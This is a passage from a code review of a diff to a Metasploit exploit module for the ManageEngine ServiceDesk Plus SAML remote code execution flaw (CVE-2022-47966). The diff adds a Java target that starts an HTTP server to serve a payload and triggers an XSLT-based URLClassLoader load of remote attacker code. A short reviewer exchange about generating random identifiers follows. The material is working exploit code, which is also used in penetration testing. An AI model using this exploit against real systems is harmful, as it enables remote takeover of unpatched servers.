modules/exploits/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966.rb

```diff
@@ -137,13 +148,61 @@ def encode_begin(real_payload, reqs)
 
   def exploit
     case target['Type']
+    when :java
+      # Start the HTTP server to serve the payload
+      start_service
+      # Trigger a loadClass request via java.net.URLClassLoader
+      trigger_urlclassloader
+      # Handle the payload
+      handler
     when :windows_command, :unix_cmd
       execute_command(payload.encoded)
     when :windows_dropper, :linux_dropper
       execute_cmdstager(delay: datastore['DELAY'])
     end
   end
 
+  def trigger_urlclassloader
+    # Here we construct a XSLT transform to load a Java payload via URLClassLoader.
+    url = get_uri
+
+    vars = Set.new
+    loop do
+      vars << Rex::Text.rand_text_alpha_lower(5..8)
+      break unless vars.size < 2
+    end
+    vars = vars.to_a
```

Comment:
Could we use https://github.com/rapid7/rex-random_identifier for this instead?

Reply:
Changed accordingly